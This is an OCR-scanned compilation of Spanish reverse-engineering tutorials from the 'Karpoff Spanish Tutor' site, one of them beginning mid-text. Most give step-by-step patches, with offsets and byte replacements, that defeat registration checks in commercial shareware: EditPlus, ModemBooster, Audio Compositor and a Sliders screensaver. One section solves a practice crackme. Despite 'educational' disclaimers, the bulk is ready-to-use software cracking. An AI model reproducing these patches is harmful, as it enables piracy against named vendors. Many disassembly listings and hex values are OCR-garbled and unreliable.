se ejecute o sea para no tener ninguna limitación. bien, goto/goto code location y escribimos la dirección de la primera call o 
sea O1065f0c. ahí tenemos la call. ahora anotamos el offset (6530c) y vamos al hex workshop. ya saben, edit/goto escribimos 
el offset y cambiamos e89bboffff por 9090909090. volvemos al w32dasm, y vamos a la segunda dirección o sea O1065faf. ahí 
está la otra call. anotamos el offset (653af), vamos al hex workshop, lo escribimos y cambiamos esf8b8ffff por 9090909090. 
ahora guardamos el ejecutable por ejemplo como crackeado.exe y lo probamos. listo, el programa queda totalmente 
funcional. podría parecer que no hicimos bien el crack ya que aunque el botón de register está deshabilitado sigue ahí. pero 
aunque nos hubiéramos registrado "legalmente" el botón seguiría ahí. ¿como lo sé?, abran el archivo de ayuda y miren las 
imágenes del programa registrado. se ve igual que el que hemos crackeado. 


aclaración a todos 


programa de nuevo y no está registrado. pero ¿porqué?. pues porque parchearon el salto equivocado. parchearon el salto 
que si saltaba, mostraba el mensaje de error. este es el típico error de los newbies. lo único que hicieron fue que nunca salte, 
por lo tanto el programa siempre mostrará el mensaje de "gracias por registrarse!!!" pero en realidad no está registrado. si 
con el w32dasm encontraron el lugar donde se realiza la comprobación, les recomiendo que no cambien ningún salto (salvo 
que quieran distribuir el crack) sino que pongan un break point en el lugar donde se realiza la rutina de comprobación y que 
vayan viendo el valor de los registros ya que casi siempre se puede hallar el serial válido de esta manera, además el crack 
será más "noble" que con los parcheos. 


final 


me despido pero no sin antes dar las gracias al grupo k-for, a profesor x por su fabulosa compilación y por toda su ayuda, a 
karpoff, por su gran apoyo y sus consejos, y a bxeli, por su apoyo moral y por pasarme algunos programas interesantes, a 
crkviz (saludos amigo!!!). y finalmente gracias a ustedes por leer mi manual. nos vemos en el siguiente. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Potente editor de texto que soporta HTML, lod ASP, JavaScript, VBScript, 
PERL, PHP, Java, C/C++ y muchos otros lenguajes. 

Herramientas: — | FileinsPEctor, WDasm, Editor Hexadecimal. 

CRACKER: Kamui 25/11/2000 


introduccion 


potente editor de texto que soporta html, css, asp, javascript, vbscript, perl, php, java, c/c++ y muchos otros 
lenguajes. puede sustituir al notepad de windows e incorpora todas las funciones necesarias para crear 
páginas web. incluye una barra de herramientas de tags html, ficheros de ayuda, herramientas definidas por el 
usuario, potentes funciones para deshacer y rehacer acciones, macros, edición drag-and-drop, una utilidad de 
transferencia de ficheros y un corrector ortográfico. 


1- cargamos el ejecutable, nos sale el nag-screen de lo mismo de siempre si estamos de acuerdo con el acuerdo , si nos 
queremos registrar...muy molesto. metemos un nombre y un serial para ver qué pasa..., pues que va a pasar el mensaje 
de error. 


UNREGISTERED COPY ES | 
EditPlus Text Editor 2.01 
Copyright * 1998-2000 ES-Computing. 
All Rights Reserved. 


Thank you for trying EditPlus, 
Unregistered Copy for Evaluation 


Enter Registration Code... | 


This is day 1 of 30-day ex guetion period. 
You should pay registration fee if you decide to 
keep il over 30-day evaluation period. 


| Agree Quit | 


2-con el fileinspector analizamos el programa, éste nos informa que en programa no está ni empakado ni encriptado 
por lo que podemos desensamblarlo tranquilos. 


3-ya desensamblado, nos disponemos a localizar el mesaje de error, por las string references no lo encontramos (o 
busqué yo mal ), bueno de todas formas le damos para que busque el mensaje : 

invalid registration. 

lo encuentra en una dirección le damos para que busque otra vez y resulta que nos aparece otra vez, en estas dos 
direcciones: 

* A28D5f ........ esta no no va a servir 

* AG20A cocoooo. esta nos vale ( lo se porque lo he probado ). 


4-en la segunda dirección podemos ver: 


(52 URSoft 4/32D asm Yer 8.93 Program Disassembler*Debugger 
Disassembler Project Debug Search Goto Execute Text Functions HexData Refs H 


6 GS GA 


:0046208F SD4C2408 lea ecx, dword ptr [esp+08] 


200462093 ESD11C0400 call 004A43D69 

00462098 8B4C02408 mov ecx, dword ptr [esp+08] 

200462090 51 push ecx 

-0046209D 56 push esi aquí se produce el 
30046209E ESADO1D000 call 00462250 chequeo 

:00462043 830408 add esp, 00000008 sil 
:00462046 85co test eax, eax 

-004620A8 7513 jne 00462080 =—__p sino salta nos lleva 
:0046204A SAFF push FFFFFFFF al error 

:0046202C 6410 push 00000010 


* Possible Reference to String Resource ID=24449: "Invalid registration 
1 
CT 68815F0000 push 0000S5F81 hd | 
4 » 
| Line:194368 Pg 3888 of 8456 Code Data (2:00462089 Offset DODE208%h in File:editplus, exe 


5-primero lo que parece más fácil es cambiar el salto que hay en 4620a8 para que no nos de el error. al cambiarlo, nos 


dice que si el serial nos lo ha dado la compañia, y que para validar el serial debemos reiniciar el programa. al 
reiniciarlo vemos que nos han "pillado" y nos dice que el serial es el incorrecto. 


6-lo que podemos hacer ahora es ver qué pasa en la llamada que hay qué hace.esta call manipulará nuestro serial para 
que cuando retorne con el ret haga creer al programa que es el serial correcto. vemos que hay en esta call: lo único 
interesante que hay es un salto que puede cambiar el curso del programa, ya que: 


ña URSoft W32D asm Yer 8.93 Program Disassembler?Debugger Pal E 
Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


:00462263 mov esi, eax 


100462265 85F6 test esi, es: 

100462267 7407 je 00462270 4 

:00462269 SF pop edi si salta vamos hacia el 
004622614 SE pop esi error, si no nos lleva a 
20046226B 5B pop ebx la llamada anterior 
300462260 23040C add esp, 00D00000€c 2. 
10046226F C3 ret 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
|:00462267 (0) : 
| salta hacia aqui 
200462270 ESSBFFFFFF call 004621B0 +] 
4 | » 
| Line:194623 Pg 3893 of 8456 Code Data (2:00462261 EDffset 00062261h in File: editplus, exe j 


7-vemos que si este salto no se produce se retorna a la call creyendose que nos hemos registrados correctamente, por lo 


que podemos nopear este salto o invertirlo. cuando reiniciamos el programa todo va normal ===> seguimos registrados 
! 


About EditPlus 


Edifs 
EdiPlus Text Editor v2.01 


Copyright 9 1998-2000 ES-Computing. 
All Rights Reserved. 


This copy is licensed to 
kamui 


2% Homepage 
1-3 Feedback 


DKB Free physical memory 
1,173 MB Free on drive E: 
Windows 98 4.10.2222 


Y 0K 7 Help 


despedida : primero gracias a todos los que escribis tutoriales porque sin ellos no podría seguir 
aumentando mis conocimientos (que son pocos la verdad) para abordar los programas. y, segundo, 
a karpotf por poner mis malos tutoriales, y a todos los del grupo de tutoriales-2000. 


nota 1: primero decir que esto es para el estudio de la protección del programa, para poder evaluarlo mejor, y que si os 
gusta,debeis comprarlo! ;-) 


nota 2: si teneis alguna duda o sugerencia o crítica, no se, lo que querais, hacermela saber, porfa... 
kamui_Olatinmail.com. 


nota 3: se me olvidaba, esta pagina html está hecha con este programa (el editplus), jeje ;-) 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Crackme KeyFile de Demian 


PROTECCION: Varias protecciones, Falta el archivo y Registrarse 
Objetivo: Conseguir que encuentre el archivo y que te reconozca como Registrado 


Es un Crackme al cual se le ha omitido el archivo llave y además una vez resuelto el 
problema del archivo tenemos que conseguir que nos reconozca como Usuarios 
Registrados 


Facil, (lo he conseguido yo) pero algo se aprende 


http: / /karpoff. welcome.to 
Win32Dasm8.93, Procdump, GetTyp y un editor Hexadecimal 


introduccion 


este texto ha sido escrito sólo con propósitos educacionales. 


comentario del programa 


este programa es un crackme, de los que cada dia por suerte hay más. 

su finalidad es que los que empezamos podamos experimentar y usar las herramientas de que 
disponemos en el mundo de la ingenieria inversa o sea aprender. 

y de paso conseguir que los programadores ofrezcan cada vez más calidad en sus trabajos. 

este tutorial lo cojí de la pagina de karpoff, para practicar, pues aparte del programa habia dos 
posibles soluciones resueltas y es que cuando empiezas, si por alguna razón te quedas clavado o 
con los cables cruzados, va muy bien poder consultar o mirar donde has errado el camino. 

pero he visto que aparte de estar en ingles sus soluciones podian ser más amplias. 


pues eso al ataque: 
lo primero que te encuentras y que a mi actualmente me da pánico es que pasando el archivo por el gettyp 
compruebas que el archivo esta comprimido 


portable executable (starting at 184 for 8008 bytes) 
packer: upx 0.81 - 0.84 [pe] (?) 
packer: upx 0.89.6 - 1.01 [pe] 


por lo tanto mano de procdump y accionar unpack, en el cuadro de dialogo que aparece seleccionar upx 

presionamos ok. y en el siguiente cuadro de dialogo "choose executable"..., buscamos la ubicación en donde tengais el 
crackme.keyfile y aceptais, a partir de aqui y si todo va bien el archivo será descomprimido y os pedirá el nombre que 
querais dar al nuevo keyfile descomprimido. 


tenemos el primer paso efectuado. 


ejecutamos el archivo descomprimido, que como vereis a pasado de 8k a 32k y nos muestra una pantalla 
en la que nos notifica lo siguiente: 


keyfile not found; 
unregistered 


el primer problema es que el programa no encuentra un archivo. 

entonces una solucion sería crear un archivo imaginario y renombrarlo, pero nos falta el nombre con el que el 
programa busca el archivo. 

abriendo el win32dasm miramos a traves de las referencias y nos encontramos una que habla de "license.key", parece 
un nombre de archivo, y además si rastreamos un poco vemos que viene de una ref. a keyfile found, entonces creamos 
un archivo y lo renombramos como license.key, corremos el programa y vemos que algo ha cambiado en el texto que 
aparece. 


keyfile found! 
incorrect keyfile! 
unregistered 


¡¡vemos que ya ha encontrado el archivo; 


si quieres ahorrarte este trabajillo puedes hacer lo siguiente: 

en la carpeta del keyfile además del ejecutable hay un archivo llamado key si lo renombras con 

el nombre license.key y ejecutas de nuevo el keyfile, verás que tambien encuentra el archivo y muestra el mismo 
mensaje. 


pero no es del todo correcto el mensaje. 

no nos gusta este mensaje, aunque el programa ya funciona mejor, aun sigue recordandonos que no estamos 
registrados y que el keyfile no es el correcto. 

pues cargamos el keyfile en el win32dasm, y a trabajar, miramos las str.ref y centramos nuestra atención 

a la que nos dice  ¡¡¡atentos teneis que cargar en el win32dasm el ejecutable descomprimido;;; 


incorrect keyfile! 


seleccionamos esta referencia y aparecemos aqui: 


:00402eda 8bOf mov ecx, dword ptr [edi] 
:00402edc 8902 mov dword ptr [edx], eax 
:00402ede 8b8574ffffff mov eax, dword ptr [ebp+ffffff74] 


* possible stringdata ref from data obj ->"incorrect keyfile!" 


:00402ee4 68101c4000 push 00401c10 --->aqui aparecemos 
:00402ee9 894204 mov dword ptr [edx+04], eax 
:00402eec 8b8578ffffff mov eax, dword ptr [ebp+ffffff78] 
:00402ef2 57 push edi 

:00402ef3 894208 mov dword ptr [edx+08], eax 
:00402ef6 8b857Cffffff mov eax, dword ptr [ebp+ffffff7c] 
:00402efc 89420c mov dword ptr [edx+0c], eax 

:00402eff ff91ec0O10000 call dword ptr [ecx+000001ec] 


rastreamos un poco de codigo hasta ver algo que parezca interesante. 


:00402e99 f£f15d0104000 call dword ptr [00401040] una llamada 


:00402e9f 6685c0 
:00402ea2 0£35d4d000000 
:00402ea8 8b16 
:00402eaa 56 

:00402eab ff92fc020000 
:00402eb1 8b1d40104000 
:00402eb7 50 

:00402eb8 8d45a4 
:00402ebb 50 

:00402ebc ffd3 

:00402ebe 83ec10 
:00402ec1 8bf8 
:00402ec3 8bd4 
:00402ec5 b804000000 
:00402eca 898570ffffff 


test ax, ax una comprobación 
jne 00402f85 ---> aqui nos paramos 
mov edx, dword ptr [esi] 
push esi 
call dword ptr [edx+000002fc] 
mov ebx, dword ptr [00401040] 
push eax 
lea eax, dword ptr [ebp-5c] 
push eax 
call ebx 
sub esp, 00000010 
mov edi, eax 
mov edx, esp 
mov eax, 0000000a 
mov dword ptr [ebp+ffffff70], eax 


:00402ed0 c78578fffff04000280 mov dword ptr [ebp+ffffff78], 80020004 
merece atencion este salto pues comprobandolo con el win32dasm vemos que nos envia a : 


:00402f54 8902 
:00402f56 8b8574:ffffff 


mov dword ptr [edx], eax 
mov eax, dword ptr [ebp+ffffff74] 


* possible stringdata ref from data obj ->"unregistered" 


:00402f5c 683c1c4000 
:00402f61 894204 mov dword ptr [edx+04], eax 
:00402f64 8b8578ffffff mov eax, dword ptr [ebp+ffffff78] 
:00402f6a 57 push edi 

:00402f6b 894208 mov dword ptr [edx+08], eax 
:00402f6e 8b857cffffff mov eax, dword ptr [ebp+ffffff7c] 


push 00401c3c 


:00402f74 89420c mov dword ptr [edx+0c], eax 
:00402f77 ff91ec010000 call dword ptr [ecx+000001ec] 
:00402f7d 85c0 test eax, eax 

:00402f7f dbe2 fclex 

:00402f81 7d77 jge 00402ffa 

:00402f83 eb63 jmp 00402fe8 


* referenced by a (u)nconditional or (c)onditional jump at address: 


|:00402ea2(c) 
:00402f85 8b0e mov ecx, dword ptr [esi]----- >aqui nos lleva el salto 
:00402f87 56 push esi 


:00402f88 f£91fc020000 
:00402f8e 8b1d40104000 


call dword ptr [ecx+000002fc] 
mov ebx, dword ptr [00401040] 


:00402f94 8d55a4 lea edx, dword ptr [ebp-5c] 
:00402f97 50 push eax 
:00402f98 52 push edx 
:00402f99 ffd3 call ebx 


:00402f9b 83ec10 
:00402f9e 8bf8 
:00402fa0 8bd4 
:00402fa2 b8024000000 mov eax, 0000000a 

:00402fa7 8985 70ffffff mov dword ptr [ebp+ffffff70], eax 

:00402fad c78578ffffff04000280 mov dword ptr [ebp+ffffff78], 80020004 
:00402fb7 8bOf mov ecx, dword ptr [edi] 

:00402fb9 8902 mov dword ptr [edx], eax 

:00402fbb 8b8574ffffff mov eax, dword ptr [ebp+ffffff74] 


sub esp, 00000010 
mov edi, eax 
mov edx, esp 


* possible stringdata ref from data obj ->"registered" 


:00402fc1 685c1c4000 push 00401c5c 


es interesante pues este salto si lo efectuamos evitamos una zona o parte de codigo que hace referencia directa a 
'' unregistered " . y vamos directos a la zona " registered ' pues vamos a ver. 

volvemos al w32dasm y miramos el ofset que corresponde a la linea que nos interesa y que es 

24a2h . 

abrimos el editor que más os guste y buscamos el ofset y la referencia 0£f85dd000000 la cambiamos por 
01f84dd000000. 

salvamos el cambio, y ejecutamos de nuevo el keyfile descomprimido, recordar, trabajamos siempre con el 
descomprimido y nos aparece lo siguiente: 


keyfile found! 
registered 


decripted 65 
ahora esta mejor, tenemos un crack que funciona y registrado. 


si este sistema no os gusta se puede hacer otra cosa, se coge el editor exa. que tengais, yo lo comento hecho con el 
hexworkshop se abre el keyfile vais a edit y luego a find en la ventana que se abre donde dice find what poneis 
unregistered y en el apartado value seleccionais ascii 

apretais find next y solo os queda cambiar unregistered por registered. 

y asi hasta conseguir que sin cambiar el salto tambien os funcione el keyfile y aparecera el registered. 

esto sirve tambien en caso de haber parcheado el salto para que en el lugar que pone decripted, podeis 
finamente colocar vuestro nombre :) 


download archivo.key 


nota. cuando sepa mas puede que explique como poner el parche en el ejecutable original de momento tendreis que 
usar el descomprimido, pero por algo se empieza 


a ti tambien, piensa que empece con tus tutoriales 
además como veras por fin he conseguido descomprimir con el procdump 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 
Programa: ModemBooster ver.2.0 


introducción 


modem booster es un acelerador web que te permitirá aumentar tu velocidad de navegación por internet, la 
descarga de ficheros, recibir y enviar tu correo, juegos on-line, charlas en la red, etc...además, el programa te 
permitirá testear el rendimiento de tu módem, y ajustar la configuración de tcp/ip para un mayor rendimiento. 
para conseguirlo utilizará un proceso automático de búsqueda.modem booster ajusta los valores de tu mtu 
(máxima unidad de transmisión), la configuración del rwin y ttl (tiempo de vida), y el tamaño del caché. el 
programa residirá en la bandeja del sistema para una rápido acceso al mismo. 


1- cargamos el ejecutable, nos sale la pantalla de presentación del programa, donde nos dice que es una copia sin 
registrar, bla bla bla... 


«Booster 2.0 Yo 


This Copy ls Registered To: 
Unregistered Evaluation Copy 
21 Evaluation Days Left 


Copyright * 1996-1999, inKline Software Labs. 41! Rights Reserved. 


2-con el fileinspector analizamos el programa, éste nos informa que en programa no está ni empakado ni encriptado 
por lo que podemos desensamblarlo tranquilos. 


3-ya desensamblado, nos disponemos a localizar el mesaje de error, este mensaje de error nos lo encontramos muchas 
veces, no vamos a saltarnos todas debemos buscar en que dirección nos envian a la sección del código donde están los 
mensajes. 


Modem Booster 


ambien podemos ver, en las string references en el wdasm, donde está el mensaje de 
gracias por registrarnos.... 


thank you for registration support! 
5-pues bien este mensaje es llamado desde 2 direcciones: 408f80, y, 408faa 


6-como siempre esto 2 saltos se pueden invertir, y ya tenemos todo solucionado, ¿no?--> pues no debemos fijarnos que 
entre las direcciones en la que empieza la cadena del codigo donde nos da el mensaje "bueno", existe un salto que nos 
amarga la vida (por poco tiempo) y que nos lleva otra vez al error: 


:0040904F OFS59FO00000 jne 0040904 este es salto a nopear., 
:00409055 SBS61C mov edx, dword ptr [esi+1C] 
:00409058 6436 push 00000036 

200409054 52 push edx 


* Reference To: USER32.KillTimer, Ord:0195h 
| 


00409061 ES325C0500 call 0045EC98 

:00409066 SB4004 mov eax, dword ptr [eax+t04] 
: 00409069 BECS mov ecx, eax 

:0040906B S8B10 mov edx, dword ptr [eax] 
:0040906D FFS274 call [edx+74] 

: 00409070 8BCS mov cx, eax 

: 00409072 ESO9610000 call 0040F180 


* Possible Reference to String Resource ID=32776: "Thank yom for your registra 
1 

:00409077 6808800000 push 00008008 

:0040907C 8D4C2410 lea ecx, dword ptr [esp+10] 

:00409080 ESB2040400 «call 00449537 


7-vemos que si este salto no se produce y cambiamos los saltos anteriormente dichos vemos que el programa se 
registra sin más problemas. 


despedida : 
primero gracias a todos los que escribis tutoriales porque sin ellos no podría seguir aumentando mis conocimientos 
(que son pocos la verdad) para abordar los programas. y, segundo, a karpoff por poner mis malos tutoriales, y a todos 


los del grupo de tutoriales-2000. 


nota 1: primero decir que esto es para el estudio de la protección del programa, para poder evaluarlo mejor, y que si os 
gusta,debeis comprarlo! ;-) 


nota 2: si teneis alguna duda o sugerencia o crítica, no se, lo que querais, hacermela saber, porfa... 
kamui_CElatinmail.com. 


nota 3: todavia no he probado el programa por lo que no se si funciona o no. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria inversa y 
programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Audio Compositor 4.1 

PROTECCION: Name/Serial 

Objetivo: Que nos hacepte cualquier S/N para registrar 

Descripcion: Editar midi's y creo que convierte de midi a wav 

Dificultad: Newbie 

DOWNLOAD: http://audiocompositor.home.att.net 

Herramientas: W32dasm - Editor Hexadecimal - RegMon 

CRACKER: CrkvViZ FECHA: 26/12/2000 
introduccion 


hola amigos!! he aquí un nuevo tutorial, es el cuarto. bien, hoy he decidido hacer un tutorial sobre el programa 
audio compositor 4.1 que sirve para editar archivos midi, y creo que tiene capacidad de convertir archivos wav a 
midi o viceversa. 


el programa es totalmente funcional, pero al iniciar el programa aparece un nag que nos demora unos segundos 
para acceder al programa. 


al atake 


comencemos... ejecutamos el programa y uffff vemos que nos aparece un orrible nag que demora 5 segundos hasta activar 
el botón "evaluate" y así comenzar a utilizar el programa normalmente. 


Unre 


gistered copy 


Welcome to Audio Compositor! 
This is an unregistered copy. 


Evaluate | [[Hegsiaionio 


entonces una vez dentro del programa hay que ir al menú help y clickear register audio compositor... y nos pide el nombre y 
un número de serie que tiene que tener una longitud de 8 bytes y escribimos cualquiera que se nos ocurra. 


Your Name [erkviz 
Registration Code hi 2345678 


Cancel | Registration Info | 


le damos ok! y nos salta ese orrible mensaje que nos dice que no coincide el serial con nuestro nombre. 


Audio Compositor 


entonces con el w32dasm lo desensamblemos y busquemos en strngref la cadena que nos aparece en ese mensaje.... 
cuando lo encontramos nos damos cuenta que un poquito más arriba en la dirección 00441ef2 hay un salto condicional que 
salta a la direccion correspondiente y decidimos invertir el salto para ver que pasa. anotamos el offset: 41ef2 y en el editor 
hexadecimal lo buscamos y reemplazamos los bytes 7413 por 7513 (o sea je por jne). 


* possible stringdata ref from data obj] ->" y 
:00441leea 68d0624c00 push 004c62d0 

:00441leef 8d4df0 lea ecx, dword ptr [ebp-10] 

:00441ef2 7413 je 00441f07.- <r=rrrarmn-- nuestro salto (salta) 
:00441ef4 e8ca510300 Call 004770c3 

:00441ef9 57 push edi 

:00441lefa 57 push edi 


ossible stringdata ref from data obj ->"the name/code combination is" 
=>"invalid." <=====- el mensaje de error 


:00441lefb 68a4a64c00 push 004cabal 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 
| :00441e98(u), :0044lead(u) 

:00441f00 e85e040400 call 00482363 
:00441f05 eb50 jmp 00441f£57 


* referenced by a (u)nconditional or (c)onditional jump at address: 
| :00441ef2 (c) 


:00441f07 e8b7510300 call 004770c3 


:00441f0c e8c9150500 call 004934da 
:00441f11 ff33 push dword ptr [ebx] 
:00441f13 8b7804 mov edi, dword ptr [eax+04] 


* possible stringdata ref from data ob] ->"general" 


:00441f16 bbd0634c00 mov ebx, 004c63d0 
:00441f1b 8bcf mov ecx, edi 


* possible stringdata ref from data obj] ->"registrationname" 


:00441f1d 6810634c00 push 004c6310 
:00441f£22 53 push ebx 

:00441f23 e869060400 call 00482591 
:00441f28 ff765c push [esi+5c] 
:00441f2b 8bcf mov ecx, edi 


* possible stringdata ref from data obj ->"registrationcode" 


:00441f£2d 68£c624c00 push 004c62fc 
:00441f£32 53 push ebx 

:00441£33 e859060400 call 00482591 
:00441£38 6a00 push 00000000 
:00441f£3a 6a00 push 00000000 


* possible stringdata ref from data obj ->"registration was" <--- mensaje eseprado :) 
=>"successful. it will take" 
=->"effect when you" 
->"restart audio compositor." 


:00441f3c 684ca64c00 push 004ca64c 
:00441f£41 e81d040400 call 00482363 
:00441f46 8bce mov ecx, esi 


una que guardamos los cambios en el editor hexadecimal, ejecutamos el programa de nuevo y en la ventana de registración 
ponemos cualquier s/n que se les ocurra y le damos ok! y ya lo hemos registrado!! 


The nametpassword pair <CrkWiz/12345678> was saved butis not valid. 
Corntinuing in unregistered mode. 


por lo que vemos al s/n lo a guardado en algún archivo o en el registro de windows. abramos el regmon 4.2 para 
comprovanlo. si! efectivamente, el programa guardó los datos en el registro en: hkey_current_usersoftwarelouter texas 
music audio compositor general y ahi aparecen los valores de cadena registrationcode y registrationname con nuestro s/n 
introducido. 


a continuación buscaremos en el w32dasm ese mensaje nuevo (the name/password pair...) 


* possible stringdata ref from data obj ->" " 


:00401909 68d0624c00 push 004c62d0 

:0040190e 8d4de8 lea ecx, dword ptr [ebp-18] 
:00401911 7511 

:00401913 e8ab570700 call 00477003 


* possible reference to menu: 


jne 00401924 <====- nuestro esperado salto (no salta) 


menuid_0001 


* possible reference to string resource id=00001: "audio compositor" 


:00401918 c7863001000001000000 


:00401922 eb54 


* referenced by a 


| :00401911 (c) 


mov dword ptr [esi+00000130], 00000001 
jmp 00401978 


(u)nconditional or (c)onditional jump at address: 


:00401924 e89a570700 Call 004770c3 

:00401929 alb8bc4c00 mov eaXx, dword ptr [004cbcb8] 
:0040192e 8945ec mov dword ptr [ebp-14], eax 
:00401931 ff75e0 push [ebp-20] 

:00401934 8d45ec lea eax, dword ptr [ebp-14] 
:00401937 c645fc16 mov [ebp-04], 16 

:0040193b ff37 push dword ptr [edi] 


* possible stringdata ref from data obj ->"the name/password pair<%s/%s>" 


->"was saved but is not valid." <-el mensaje 


:0040193d 6894624c00 push 004c6294 

:00401942 50 push eax 

:00401943 e878fe0600 call 004717c0 

:00401948 83c410 add esp, 00000010 

:0040194b 8d4dec lea ecx, dword ptr [ebp-14] 
:0040194e 6870624c00 push 004c6270 

:00401953 e8be590700 Call 00477316 

:00401958 6a00 push 00000000 

:0040195a 6a00 push 00000000 

:0040195c ff75ec push [ebp-14] 

:0040195f e8f£f090800 call 00482363 

:00401964 53 push ebx 

:00401965 8bcf mov ecx, edi 

:00401967 e857570700 call 00477003 

:0040196c 8d4dec lea ecx, dword ptr [ebp-14] 
:0040196f c645fc14 mov [ebp-04], 14 

:00401973 e8c2550700 call 00476f3a 


un poco más arriba del mensaje de error hay también un salto condicional que deberemos invertirlo para que no entre hacia 
las rutinas del error. entonces anotemos el offset: 1911 y en el hview reemplazaremos 7511 por 7411 (¡ne por je) y eso 
seguramente nos solucionará el problema. una vez aplicdo los cambios, abrimos el audio compositor y nos queda 


definitivamente registrado!!! 


bueno, aquí doy por finalizado mi cuarto tutorial, y como siempre hago estos tutoriales especialmente dedicado a los newbies 
para que lo puedan entender mejor y espero que hayan aprendido algo y que les haya sido útil. 

quiero agradecer en especial sin orden de preferencia a: a todos los miembros del grupo k-for, en especial a: dek_Gin, 
profesor_x, txeli, karpoff, raziel, leirus, viper, mr.burns, act mago, txo txo, code_mex, turbop, kuato_thor, por todo su 


aguante y a todos los crackers que escriben tutoriales. 


mi dirección de e-mail: crkvize+hotmail. com 
mi página web: http://go.to/crkviz 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 
Sliders 3D OpenGL Screen Saver v1.3 


introducción 


hola amigos, presento mi décimo séptimo tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoGhotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 
en este tutorial usaremos el w32dasm. si no lo tienes instalado puedes bajártelo en www.crackstore.com . asumo 
que tienes conocimientos básicos sobre su uso. y para terminar con la intro debo decir : este texto ha sido escrito 
sólo con propósitos educacionales. 


antes de abrir el programa lo analizamos con file inspector v3.5 el que nos mostrará información realmente importante a la hora 
de atacar el programa; bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en microsoft visual c ++5.0 
e no está empacado 


a continuación... cerramos file inspector v3.5 y nos vamos a la configuración de sliders 3d opengl screen saver. 


una vez que estamos en la configuración vemos un botón que dice register now!, lo presionamos y estaremos en la caja de 
registro, la que nos pide los aiguientes datos: 


first and last name: 


email address: 


registration code: 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a register y por supuesto que el programa no aceptará 
el código de registro y nos mostrará un mensaje como este... 


registration code invalid! 


a continuación... cerramos sliders 3d opengl screen saver. 


usando el w32dasm 


note: you must enter the exact same information as you used to purchase this software with. 


ahora abrimos el archivo sliders.scr con el w32dasm y presionamos el botón de las string data references para buscar aquel 
mensaje que nos decía que el registro no era válido, pero al buscarlo nos damos cuenta que ahí no está, entonces debemos buscar 


el texto aquí... 
name: dialogid_006c, * of controls=002, caption:"registration", classname:"" 

001 - controlid:0001, control class: "button" control text:"ok" 

002 — controlid:ffff, control class: "static" control text:"registration 
successful thank 
name: dialogid_006d, * of controls=003, caption: "registration", classname:"" 

001 - controlid:0002, control class: "button" control text:"ok" 

002 — controlid:ffff, control class: "static" control text:"registration code 
invalid!" 

003 - controlid:ffff, control class:"static" control text: "note: you must enter 


the exact 


ya lo hemos encontrado y unas líneas más arriba destacado en azul está el mensaje bueno, entonces ahora debemos seguirle la 
pista a nuestro mensaje malo y para eso debemos ir a search > find text y escribir el diálogo al que pertenece, es decir, 
dialogid_006d, lo buscamos en el w32dasm y caeremos aquí... 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 
| :00404281(c), :0040428f(c), :004042a0(c), :004042c3 (c) --->de estos viene el diálogo de 
| registro inválido 


:004042e7 53 push ebx 
:004042e8 68e£f3d4000 push 00403def 
:004042ed 57 push edi 


* possible reference to dialog: dialogid_006d --->aquí está el diálogo de registro inválido 


:004042ee 6abd push 0000006d 
:004042f0 ff35b0994100 push dword ptr [004199b0] 


esto nos aclara un poco más lo que tenemos que hacer para encontrar una solución, tenemos los saltos y debemos buscar el salto 
clave o los saltos claves que determinan que el mensaje de registro inválido salga o deje pasar el mensaje de registro aceptado, 
pero si vemos un poco más arriba en el listado muerto nos encontraremos con esto... 


* possible stringdata ref from data obj ->"sliders" 


:004042b4 6824634100 push 004163a4 

:004042b9 e8c5bceffff Ccal1 00401183 

:004042be 83c410 add esp, 00000010 este es un salto que 
:004042c1 85c0 test eax, eax determina la salida del mensaje 
:004042c3 7422 je 004042e7 ---> de registro inválido y que también 
:004042c5 53 push ebx determina la salida del mensaje 
:004042c6 68e£3d4000 push 00403def de registro aceptado :) 
:004042cb 57 push edi 


* possible reference to dialog: dialogid_006c --->como ya habíamos visto este es el diálogo 
| de registro aceptado 


:004042cc 6abc push 0000006c 
:004042ce ff35b0994100 push dword ptr [004199b0] 
:004042d4 891df4604100 mov dword ptr [004160f£4], ebx 


al parecer ya tenemos la solución, y esta consiste en invertir el salto que está justo antes del diálogo de registro aceptado, 
repitiéndose una vez más la archi-conocida y más simple forma de parchar un programa para que nos acepte el registro que le 
metamos. 


a continuación anotamos el offset, el que se encuentra en la parte inferior del w32dasm, y más específicamente aquí... 


line:6649 pg 83 and 84 of 521 code data (2:004042c3 Coffset 000042c3h in file: sliders.scr 


ya que tenemos nuestro offset ahora debemos hacer el trabajo sucio en el hex workshop y este el trabajillo consiste en cambiar el 
salto condicional que está antes del diálogo de registro aceptado. 


abrimos el hex workshop, vamos a file > open... y abrimos el archivo sliders.scr, una vez abierto vamos a edit > goto... e 
insertamos nuestro offset que era 42c3, le damos a go y estaremos aquí... 


00004200 1085 C074 2253 
000042DO0 B099 4100 691D 
000042E0 E868 F6FF FFEB 


ese 74 lo cambiamos a 75, quedando así... 


00004200 1085 C075 2253 
000042DO0 B099 4100 691D 
000042E0 ES68 F6FF FFEB 


lo que hicimos fue esto: 


:004042c3 7422 je 004042e7 


lo cambiamos a: 


:004042c3 7522 jne 004042e7 


guardamos los cambios, vamos a la configuración del programa, damos click en register now! y una vez en la caja de registro 
insertamos nuestros datos, cualquier registration code, damos click en register y... 


registration successful 


thank you. 


cerramos el programa, lo volvemos a abrir para ver si lo hemos hecho bien y el estilo de no registrado se ha ido... el parche fue 
exitoso. 


programa crackeado... 


nota 


